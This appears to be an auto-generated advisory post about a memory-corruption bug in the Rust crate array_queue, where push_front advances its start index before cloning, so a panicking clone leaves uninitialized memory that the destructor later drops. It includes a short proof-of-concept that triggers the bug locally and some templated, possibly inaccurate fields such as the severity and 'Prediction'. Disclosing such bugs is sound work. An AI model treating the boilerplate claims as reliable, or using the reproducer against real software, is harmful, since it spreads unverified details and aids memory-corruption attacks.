Listen to this Post
The vulnerability exists in the `push_front` method of the array_queue::ArrayQueue. The method receives a value to clone and insert. It first advances the internal `start` index to reserve a slot for the new element. However, it performs this index update before the potentially-panicking operation of cloning the input value. If the user-defined `clone()` method panics, the function exits early, leaving the data structure in an inconsistent state. The `start` index now points to a memory slot that was reserved but never initialized with a valid value. Later, when the `ArrayQueue` is dropped, its destructor iterates over all elements it believes are initialized, based on the indices. It will attempt to call `drop` on the uninitialized memory in the slot referenced by the advanced `start` index. This operation of deallocating uninitialized memory is undefined behavior and can lead to memory corruption.
Platform: Rust crate
Version: array_queue
Vulnerability: Memory corruption
Severity: Critical
date: 2021-03-17
Prediction: Patched 2021-03-17
What Undercode Say:
git clone https://github.com/etaoins/array_queue.git cd array_queue git checkout 728fe1b cargo build
// Proof-of-Concept triggering the vulnerability
use array_queue::ArrayQueue;
struct PanicOnClone;
impl Clone for PanicOnClone {
fn clone(&self) -> Self {
panic!("Exploit triggered");
}
}
fn main() {
let mut queue = ArrayQueue::new(1);
let _ = std::panic::catch_unwind(std::panic::AssertUnwindSafe(|| {
queue.push_front(PanicOnClone);
}));
// queue is dropped here, triggering the bug
}
How Exploit:
Panic during clone.
Protection from this CVE
Update to patched version.
Impact:
Memory corruption, UB.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
